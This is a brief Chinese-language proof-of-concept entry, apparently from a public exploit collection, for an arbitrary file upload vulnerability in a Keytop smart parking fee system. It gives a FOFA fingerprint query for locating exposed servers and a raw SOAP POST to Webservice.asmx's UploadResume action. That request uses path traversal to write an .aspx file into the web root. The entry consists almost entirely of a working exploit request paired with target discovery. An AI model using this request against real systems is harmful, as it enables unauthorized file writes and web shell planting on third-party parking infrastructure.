## 科拓全智能停车收费系统Webservice.asmx存在任意文件上传 ## fofa ``` body="/KT_Css/qd_defaul.css" ``` ## poc ``` POST /Webservice.asmx HTTP/1.1 Host: ip Content-Type: text/xml; charset=utf-8 Content-Length: 455 SOAPAction: "http://tempuri.org/UploadResume" 1 ../../../../test7.aspx dGVzdA== 3 ``` ![image](https://github.com/wy876/POC/assets/139549762/1535e458-f196-46d7-b63c-f45ba47d85a6)